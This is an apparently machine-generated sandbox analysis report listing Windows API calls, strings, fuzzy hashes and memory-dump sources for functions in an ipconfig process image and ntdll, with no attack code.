                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: 54cf722920081087a9bf8cc9caad093cc4d652912987ff467a3cf112ce251450
                                                                                              • Instruction ID: 551c51bfc1de704b8a73ed41fb664871324754d2334ff85f0ff056c7809cb114
                                                                                              • Opcode Fuzzy Hash: 54cf722920081087a9bf8cc9caad093cc4d652912987ff467a3cf112ce251450
                                                                                              • Instruction Fuzzy Hash: CC51B675A00645ABDB30DE5CC8A8A7FBBF9EB44304B44846AE8D6D7781D774EE40CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00C74BE2
                                                                                              • _wcsicmp.MSVCRT ref: 00C74C03
                                                                                              • _wcsicmp.MSVCRT ref: 00C74C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$EnvironmentVariable
                                                                                              • String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
                                                                                              • API String ID: 198002717-1479523454
                                                                                              • Opcode ID: 7d3a11b9298661883ed5fd25e88cfee05d65ee4df4784ee060028bcd1e03f701
                                                                                              • Instruction ID: 5724ed4fc693669651af2b2f6a4757d9c1a6833424b5f10773f893d9b8003a59
                                                                                              • Opcode Fuzzy Hash: 7d3a11b9298661883ed5fd25e88cfee05d65ee4df4784ee060028bcd1e03f701
                                                                                              • Instruction Fuzzy Hash: 6B112C3560430AEFDF28DB25DC15BAD7BE8EF44321F608469F64DD6080EBB0DA408B15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000001,?,?), ref: 00C741CF
                                                                                              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000002,?,?), ref: 00C74212
                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 00C74249
                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00C74260
                                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C74267
                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 00C7427F
                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00C742FE
                                                                                              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C74305
                                                                                              • DnsQueryConfigAllocEx.DNSAPI(00010003,00000000,00000000), ref: 00C74312
                                                                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00C7433D
                                                                                              • DnsFreeConfigStructure.DNSAPI(00000000,00010003), ref: 00C74381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocComputerConfigFreeNameNetworkParamsProcess$ByteCharMultiQueryStructureWide
                                                                                              • String ID:
                                                                                              • API String ID: 3728844974-0
                                                                                              • Opcode ID: 5bbc45da40b8e849233d22c815ddf9cf71972f29c246852cc1cfadf79431e8a3
                                                                                              • Instruction ID: c23ea6c54b84ca566a15b3c24364d71f55516258c3b93c5858563019c1adf264
                                                                                              • Opcode Fuzzy Hash: 5bbc45da40b8e849233d22c815ddf9cf71972f29c246852cc1cfadf79431e8a3
                                                                                              • Instruction Fuzzy Hash: F351B371904319AFE7296B60DC8DFAF777CEB44710F1081A9F51D96092DB709E809A21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02D24742
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02D246FC
                                                                                              • Execute=1, xrefs: 02D24713
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02D24725
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02D24655
                                                                                              • ExecuteOptions, xrefs: 02D246A0
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02D24787
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              • Opcode ID: bb2a440cd211c8e6b2aa98606caa63a18e76ef5a44e1831f0458ec0a79602d59
                                                                                              • Instruction ID: 0f87bdfc6db10748f882499049904cb21e76aff4c3bcbc58cb6cd839fd6c0b12
                                                                                              • Opcode Fuzzy Hash: bb2a440cd211c8e6b2aa98606caa63a18e76ef5a44e1831f0458ec0a79602d59
                                                                                              • Instruction Fuzzy Hash: 3D510B71A00219AAEF11EBA4DC5AFAAB7BDEF54708F1400A9D506AB290D7709E49CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00C729FD
                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000400), ref: 00C72A16
                                                                                              • Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00C72A38
                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00C72A49
                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00C72A54
                                                                                              • Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00C72A6E
                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00C72AEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Local$AllocClassesDhcpv6FreeUser$ConvertInterfaceLuidName
                                                                                              • String ID: pFYo
                                                                                              • API String ID: 1150267431-2283279398
                                                                                              • Opcode ID: ad14449981e85e05150c90981634ee3cafdd65f51602e32fc1a8c9dfefe05def
                                                                                              • Instruction ID: f41114d9cfceebf21df958f2a9aca01665faa44810a8ebbf64f01f1950af8ebd
                                                                                              • Opcode Fuzzy Hash: ad14449981e85e05150c90981634ee3cafdd65f51602e32fc1a8c9dfefe05def
                                                                                              • Instruction Fuzzy Hash: 46415272E00309AFDB159FE4DC85B9EB7B8FF48710F148126F919AB281DBB09D459B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00C74B41: _fileno.MSVCRT ref: 00C74B4C
                                                                                                • Part of subcall function 00C74B41: _get_osfhandle.MSVCRT ref: 00C74B53
                                                                                                • Part of subcall function 00C74BBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00C74BE2
                                                                                                • Part of subcall function 00C74BBC: _wcsicmp.MSVCRT ref: 00C74C03
                                                                                              • fgetpos.MSVCRT ref: 00C74CA8
                                                                                              • _fileno.MSVCRT ref: 00C74CC2
                                                                                              • _setmode.MSVCRT ref: 00C74CCA
                                                                                              • fwprintf.MSVCRT ref: 00C74CD6
                                                                                              • fgetpos.MSVCRT ref: 00C74CEF
                                                                                              • _fileno.MSVCRT ref: 00C74D09
                                                                                              • _setmode.MSVCRT ref: 00C74D11
                                                                                              • _fileno.MSVCRT ref: 00C74D21
                                                                                              • _write.MSVCRT ref: 00C74D29
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2328354365-0
                                                                                              • Opcode ID: 7aa34cba251d806cb936380711b0621028296b697a6459712d3d66f3752a1d4e
                                                                                              • Instruction ID: 990c30c4dbce236c422c4cf242d7872034b102937be1a5d178c57e120c588a69
                                                                                              • Opcode Fuzzy Hash: 7aa34cba251d806cb936380711b0621028296b697a6459712d3d66f3752a1d4e
                                                                                              • Instruction Fuzzy Hash: AA116331D45208EFEB289B64EC0ABDD77A9FF11314B508455F65DD2080FB70AB41CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00C757D0,0000000C), ref: 00C74FA0
                                                                                              • _amsg_exit.MSVCRT ref: 00C74FB5
                                                                                              • _initterm.MSVCRT ref: 00C75009
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00C75035
                                                                                              • exit.MSVCRT ref: 00C7507C
                                                                                              • _XcptFilter.MSVCRT ref: 00C7508E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                              • String ID:
                                                                                              • API String ID: 796493780-0
                                                                                              • Opcode ID: 62d5b6d5108036f0866ac3775859fd99ce6fb3f379041f53a2490ef1615a62cb
                                                                                              • Instruction ID: 8d83c0ebedc89e69c5199527864e51bdac19435470d43a6c576113c52810efef
                                                                                              • Opcode Fuzzy Hash: 62d5b6d5108036f0866ac3775859fd99ce6fb3f379041f53a2490ef1615a62cb
                                                                                              • Instruction Fuzzy Hash: 49319E71A04B11DFDB259F69EC4576D77A0FB08720F108129F51D976B0DBB08980DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _fileno.MSVCRT ref: 00C74B4C
                                                                                              • _get_osfhandle.MSVCRT ref: 00C74B53
                                                                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,0000054F,00000000,00002908), ref: 00C74B69
                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00C74B75
                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00C74B7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileType_fileno_get_osfhandle
                                                                                              • String ID:
                                                                                              • API String ID: 3475475711-0
                                                                                              • Opcode ID: 2a6bd4042213c3de684badb386f3ede19010ce95e187a98659d84c895f396679
                                                                                              • Instruction ID: f8b20a44de70550dee966a9eaa086f8a8a3f1dee7aa148aa233dfd41b1114545
                                                                                              • Opcode Fuzzy Hash: 2a6bd4042213c3de684badb386f3ede19010ce95e187a98659d84c895f396679
                                                                                              • Instruction Fuzzy Hash: 9901D633608604AF97295BB66C48F7F3AEDD7813B13244665E92EC2190EB30CD80D6A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                              • Instruction ID: 42c46ed0b63c3f566711526347ee1204c57c3b38f362afd3a0c0e504e69e22f3
                                                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                              • Instruction Fuzzy Hash: 53023771508341AFD345EF28C490A6BBBEAEFC4714F14896DF9954B364DB31E904CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                              • Instruction ID: 9ed70324083fa7724ee9d2b020aacf5c990d709df583b1f7e853e161f86c84c7
                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                              • Instruction Fuzzy Hash: BA81B370E452499EDFE88E68C8517FEBBB2AF8D35CF18411ADA51A7290C7349E40CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              • Opcode ID: f2b637282085ba251dcbe9747c0ffbe313edfa24dd9788f0b97974847d9020c3
                                                                                              • Instruction ID: b4e2f88dadb5c2cc96d4ad91c589fd72f9f062fe2c3cc7bac0469a6a18385f31
                                                                                              • Opcode Fuzzy Hash: f2b637282085ba251dcbe9747c0ffbe313edfa24dd9788f0b97974847d9020c3
                                                                                              • Instruction Fuzzy Hash: 05212C76E00119ABDB10DE69D858AFEBBE9EF54744F440126ED45E3340E734DA01DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00C72054
                                                                                              • DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00C72071
                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00C720AC
                                                                                              • DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00C720CC
                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00C7214C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassesDhcpEnumLocal$AllocConvertFreeInterfaceLuidName
                                                                                              • String ID:
                                                                                              • API String ID: 3187720636-0
                                                                                              • Opcode ID: a003c6159397bb7cd1cda322f1d8c125066102ee289e53ae1d4c0d73e075a23a
                                                                                              • Instruction ID: a7dcfc784404cfc192c6e7bb77d7492a5a9109bec56687511e8851fb09746409
                                                                                              • Opcode Fuzzy Hash: a003c6159397bb7cd1cda322f1d8c125066102ee289e53ae1d4c0d73e075a23a
                                                                                              • Instruction Fuzzy Hash: 6B419472E00208AFDB14AFE4DC85BAEB779FF44710F548129FA1DAB281DBB09D449790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadCompartmentId.IPHLPAPI ref: 00C74641
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              • NsiAllocateAndGetTable.NSI(00000001,00C71350,00000007,?,00000004,?,00000668,00000000,00000000,00000000,00000000,?,00000001), ref: 00C7468B
                                                                                              • SetCurrentThreadCompartmentId.IPHLPAPI(?), ref: 00C746A7
                                                                                              • SetCurrentThreadCompartmentId.IPHLPAPI(00000000), ref: 00C746DF
                                                                                              • NsiFreeTable.NSI(?,?,00000000,00000000), ref: 00C746ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: CompartmentCurrentThread$FreeTable$AllocateFormatLocalMessage__iob_func
                                                                                              • String ID:
                                                                                              • API String ID: 4019950967-0
                                                                                              • Opcode ID: 51573e53a62b5008a1a4a07d90b465ac4c320beb12437d70f6f3e42b1a4ea6cb
                                                                                              • Instruction ID: 7876db6a00028e6b3cba0f7e0a69d8e651254ed0295d33de363826327e72fed6
                                                                                              • Opcode Fuzzy Hash: 51573e53a62b5008a1a4a07d90b465ac4c320beb12437d70f6f3e42b1a4ea6cb
                                                                                              • Instruction Fuzzy Hash: F911B431A00218BFDB246BE1DC0AFAF7F68EF42B50F004054F61CAB091DBB19A45DAA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00C730B1
                                                                                              • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00C730BF
                                                                                              • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00C730D9
                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00C730E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$DateErrorFormatLastLocalSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1951311907-0
                                                                                              • Opcode ID: 95e3e16ea37ca7efbace8635438b7e8c1a80822e279fe8d54c191b3488120e7a
                                                                                              • Instruction ID: b6f5b49a1460a6cae3cf5ced07690f5e20250465a3b698c823a1326329b0ccbf
                                                                                              • Opcode Fuzzy Hash: 95e3e16ea37ca7efbace8635438b7e8c1a80822e279fe8d54c191b3488120e7a
                                                                                              • Instruction Fuzzy Hash: 0711A172604209AFEB249B659C0AFFF7BBCEB44750F404136F60AE61C0DA7099858BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00C75642
                                                                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00C75651
                                                                                              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00C7565A
                                                                                              • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00C75663
                                                                                              • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00C75678
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: be1112bdb193a81a5a54b586381b071a761be4652ae00e04b79bfc6311b94cbd
                                                                                              • Instruction ID: 35aa5b9865d8a92f55b6fe7eb7041be7fc7d6ada7bf09806f2fe592c2f32cdda
                                                                                              • Opcode Fuzzy Hash: be1112bdb193a81a5a54b586381b071a761be4652ae00e04b79bfc6311b94cbd
                                                                                              • Instruction Fuzzy Hash: 211118B5D05608EFCB10DBB8DA4879EBBF5FF58310FA18969E40AE7210E7709B408B44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • RTL: Re-Waiting, xrefs: 02D2031E
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02D202E7
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02D202BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              • Opcode ID: 74c85d15eb41c4a374a9ee8b913f8e87e2a103ec60a111436aefcfe76199d14a
                                                                                              • Instruction ID: e1454f57fdd5a74d222ef3d3bfed9b3ef614c5826ed7344300ee2be30bedce93
                                                                                              • Opcode Fuzzy Hash: 74c85d15eb41c4a374a9ee8b913f8e87e2a103ec60a111436aefcfe76199d14a
                                                                                              • Instruction Fuzzy Hash: BEE1DD306087419FD725CF28C884B2AB7E1BF94318F144A6DF6A68BBE0D774D949CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • RTL: Re-Waiting, xrefs: 02D27BAC
                                                                                              • RTL: Resource at %p, xrefs: 02D27B8E
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02D27B7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              • Opcode ID: 2e2ec36358651bec4fbf9619b24eddd8a36c8f2029f2df96ab6367c14c7a9c85
                                                                                              • Instruction ID: 96648ec9fd63dae446c7cbd9931fe3bfad1966ad538874edd48ea3f7ac14d394
                                                                                              • Opcode Fuzzy Hash: 2e2ec36358651bec4fbf9619b24eddd8a36c8f2029f2df96ab6367c14c7a9c85
                                                                                              • Instruction Fuzzy Hash: 9141AC357017429BDB24DA25C840B6AB7E5FB88718F100A2DE95ADB780DB31ED05CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D2728C
                                                                                              Strings
                                                                                              • RTL: Re-Waiting, xrefs: 02D272C1
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02D27294
                                                                                              • RTL: Resource at %p, xrefs: 02D272A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
